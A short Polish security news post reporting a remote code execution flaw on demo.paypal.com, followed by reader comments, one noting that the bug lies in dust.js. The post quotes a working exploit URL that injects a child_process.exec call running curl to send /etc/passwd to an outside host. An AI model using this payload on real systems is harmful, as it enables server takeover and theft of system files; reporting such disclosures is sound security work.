Node.js – wykonanie kodu w OS na serwerze Paypala

20 sierpnia 2016, 10:20 | W biegu | komentarze 3
Tagi: ,
: oglądaj sekurakowe live-streamy o bezpieczeństwie IT.

O problemach bezpieczeństwa w node.js pisaliśmy już jakiś czas temu. Teraz świeży bug umożliwiający wykonanie kodu w os na demo.paypal.com.

Tym razem udało się znaleźć problem przy okazji fuzzingu w burpie:

tee

Finalnie exploit okazał się w miarę prosty (wysłanie /etc/passwd do serwera atakującego):

https://demo.paypal.com/demo/navigation?device[]=x&device[]=y’-require(‚child_process’).exec(‚curl+-F+”x=cat+/etc/passwd„+artsploit.com’)-‚

–Michał Sajdak

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. heliar

    Ależ Monsieur – proszę zaprzestać! Znów nie będę w stanie za VPSa zapłacić jak zepsujecie paypal’a… ;)

    Odpowiedz
    • zero one

      He he :D
      Pzdr.

      Odpowiedz
  2. Łukasz

    No dobra, ale to nie jest exploit w node.js tylko w dust.js. Trochę jakby napisać headline, że exploit w PHP, bo ktoś znalazł dziurę w Code Igniter…

    Odpowiedz

Odpowiedz